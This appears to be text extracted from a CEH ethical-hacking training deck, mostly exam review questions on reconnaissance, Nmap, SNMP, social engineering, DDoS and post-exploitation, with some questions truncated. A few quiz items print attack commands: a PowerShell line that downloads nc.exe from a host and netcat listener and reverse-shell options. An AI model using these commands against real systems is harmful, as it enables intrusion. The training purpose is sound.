Professional Documents
Culture Documents
CEHday 1
CEHday 1
CEHday 1
Omar Santos
@santosomar
DAY 1
Social Engineering
Denial-of-Service
Cryptography
IoT Hacking
Cloud Computing
Resources:
CEH Review: https://cehreview.com
The Art of Hacking: https://theartofhacking.org
GitHub: https://h4cker.org/github
https://learning.oreilly.com/certifications/9780136758433/
DISCLAIMER | WARNING
The information provided on this training is for educational purposes only. The author, O’Reilly,
or any other entity is in no way responsible for any misuse of the information.
Some of the tools and technologies that you will learn in this training class may be illegal
depending on where you reside. Please check with your local laws.
Please practice and use all the tools that are shown in this training in a lab that is not connected
to the Internet or any other network.
What this class is and is not…
How long have you been performing security penetration testing (ethical hacking)?
• Just started
• Less than a year
• 1-2 years
• 3 years or more
• I have never done pen testing. I am just curious about this training.
POLL QUESTION
https://www.eccouncil.org/programs/certified-ethical-hacker-ceh
EC-Council CEH Exam Collateral
• Exam Brochure:
https://www.eccouncil.org/wp-content/uploads/2016/07/CEHv10-Brochure.pdf
• Blueprint: https://cert.eccouncil.org/certified-ethical-hacker.html
• FAQ: https://cert.eccouncil.org/faq.html
https://www.eccouncil.org/programs/certified-ethical-hacker-ceh
CEH (ANSI) vs CEH Practical
Before we get started with Ethical Hacking…
A few concepts that you must be familiar with (in the forms
of review questions)…
What is the CIA Triad?
Confidentiality
Integrity Availability
Which of the following ensures that data is received without
modification?
a) Integrity
b) Availability
c) Authentication
d) Authorization
e) Confidentiality
Which of the following attacks leverages built-in code and
scripts within off-the-shelf applications?
a)Privilege escalation
b)Heap attacks
c) Shrink-wrap
d)Cross-site scripting
Which of the following describes an attacker that is
motivated by political believes?
a) Script kiddie
b) Hacktivist
c) Gray hat hacker
d) Black hat hacker
Which of the following best describes when the tester does not
have any prior knowledge of the systems being tested?
Pre-engagement
PRE-
Report End
Vulnerability
Foot-printing Scanning Enumeration
Analysis
Attack types:
https://cehreview.com/go/attack_types
https://cehreview.com/go/attack_types2
• Maltego
• Recon-NG
• Spider Foot
• The Harvester
• Discover
• OWASP Amass
Additional References for Passive Recon
Examples:
Scanners: Nmap, Nessus, Qualys, Nexpose, Retina
https://github.com/The-Art-of-Hacking/art-of-hacking/blob/master/cheat_sheets/PowerShellCheatSheet_v41.pdf
SNMP
b) SNMPv3 uses two authenticating credentials: the first is a public key to view the configuration or to obtain health
status of the device, and the second is a private key to configure the managed device. SNMPv2c uses three credentials
including a certificate.
c) SNMPv2c uses certificates for authentication or a pre-shared key. SNMPv3 authenticate SNMP users using usernames
and passwords.
d) SNMPv2c uses two authenticating credentials: the first is a public community string to view the configuration or to
obtain health status of the device, and the second is a private community string to configure the managed device.
SNMPv3 authenticate SNMP users using usernames and passwords and can protect confidentiality. SNMPv2 does not
provide any confidentiality protection.
Nmap SNMP Scripts
root@kali:/usr/share/nmap/scripts# ls -1 snmp*
snmp-brute.nse
snmp-hh3c-logins.nse
snmp-info.nse
snmp-interfaces.nse
snmp-ios-config.nse
snmp-netstat.nse
snmp-processes.nse
snmp-sysdescr.nse
snmp-win32-services.nse
snmp-win32-shares.nse
snmp-win32-software.nse
snmp-win32-users.nse
root@kali:/usr/share/nmap/scripts#
Other Enumeration You Should Become Familiar With…
• LDAP Enumeration
• NTP Enumeration
• NETBIOS/SMB Enumeration
enum4linux
IP Scanner
http://10base-t.com
Fing
Additional Mobile Scanning Tools
qHackode
qzANTI
qcSploit
qFaceNiff
qPortDroid
qPamn IP Scanner
Additional References for Active Recon
q CHEAT Sheets:
https://cehreview.com/go/cheat
What does the following command do?
# hping3 -S theartofhacking.org –p 80
What does the following command do?
# nmap –F portal.h4cker.org
Which of the following is not an open source scanner?
(Select all that apply)
a)Retina
b)Nmap
c)Qualys
d)Nexpose
Which of the following tools is primarily used to enumerate
domain information?
a)DNSRecon
b)Nmap
c) Metasploit
d)Nikto
When running an Nmap SYN scan, what will the Nmap result be if
ports on the target device do not respond?
a) Open
b) Closed
c) Filtered
d) Listening
Which of the following Nmap options would you use to
perform a TCP connect scan?
a)-sF
b)-sU
c)-sT
d)-sS
Which method of information gathering uses publicly
available information sources to collect and analyze
information about a target?
b) Vulnerability Scanning
c) Port Scanning
d) Packet Crafting
Which type of vulnerability scan would require the scanner
to login to the target system and run privileged level
commands to gather results ?
a) Discovery scan
b) Unauthenticated scan
c) Authenticated scan
d) Web scan
Vulnerability Analysis and System Hacking
Things that you should know…
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
Whiteboard
Explanation
Things that you should know…
first.org/cvss
Product vs. Services Based Vulnerability Assessment
Products VS Services
OpenVAS
http://www.openvas.org/
Remember the EC Council’s Definition of System Hacking
¯\_(ツ)_/¯
a)41
b)8080
c)445
d)25
What is a Tree Based Assessment Approach?
a) The pen tester uses different strategies for each system and component (i.e.,
different scanners, tools)
b) The pen tester uses the same strategies for each system
a) Malvertising
b) Pharming
c) Active Ad Exploitation
d) Whaling
Which of the following is true about Spear Phishing?
b) Spear phishing are phishing attempts that are constructed in a very specific way
and directly targeted to specific individuals or companies.
c) Spear phishing, Whaling, and Phishing are the same type of attack.
a) Whaling is similar to phishing and spear phishing; however, the attack is targeted
at high-profile business executives and key individuals within a corporation.
b) Whaling is similar to phishing and spear phishing; however, the attack is targeted
at critical systems and cloud services.
b) The victim takes close attention of your gestures, but you should not pay
attention to their posture or body language.
c) If you are carrying over an interrogation, you should pay attention to the
victim’s posture, body language, color of the skin, and eye movement.
d) It is illegal to pay attention to the victim’s posture, body language, color of the
skin, and eye movement during an interrogation.
So what is social engineering?
• Social engineering attacks leverage the weakest link, which is the human user.
• If the attacker can get the user to reveal information, it is much easier for the
attacker to cause harm rather than using some other method of reconnaissance.
• This could be done through email or misdirection of web pages, which results in
the user clicking something that leads to the attacker gaining information. Social
engineering can also be done in person by an insider or outside entity or over the
phone.
Denial-of-Service
• DDoS attacks can generally be
divided into the following three
Denial-of- categories:
service (DoS)
and distributed • Direct DDoS attacks
• Reflected
DoS (DDoS) • Amplification DDoS attacks
Direct DDoS
attacks
Botnets
Reflected
DoS
An amplification attack is a form of reflected
attack in which the response traffic (sent by
Amplification the unwitting participant) is made up of
packets that are much larger than those that
Attacks were initially sent by the attacker (spoofing
the victim).
Session Hijacking, Evading IDS, IPS, Firewalls,
and Honeypots (and more – I want for you to
learn beyond CEH)…
Evasion Encryption & Obfuscation
Demo Using the Eternalblue
Techniques Exploit
Pivoting Whiteboard Explanation
egressbuster & just a simple
Exfil letmeout script…
Which of the following are post exploitation activities to
maintain persistence in a compromised system?
a) The netcat utility is used to create a bind shell on the victim system and to execute
the bash shell.
b) The netcat utility is used to create a reverse shell on the victim system and to
execute the bash shell.
c) The netcat utility is used to create a reverse shell on the victim system and to
exclude the bash shell from being executed.
d) The netcat utility is used to create a reverse shell on the attacking system and to
exclude the bash shell from being executed.
Which of the following command creates a listener on a
system on port 8899?
a) nc -nv 8899
b) nl -cp 8899
d) nc -lvp 8899
Which of the following is NOT a legitimate Windows tools
can be used for post-exploitation tasks?
a) PowerShell
b) PowerSploit
c) PSExec
d) WMI
(New-ObjectSystem.Net.WebClient).DownloadFile("http://192.168.78.147/nc.exe","nc.exe")
a) SET
b) Mimikatz
c) PowerSploit
d) Empire
What are false positives, false negatives, true positives,
true negatives?
File-less Malware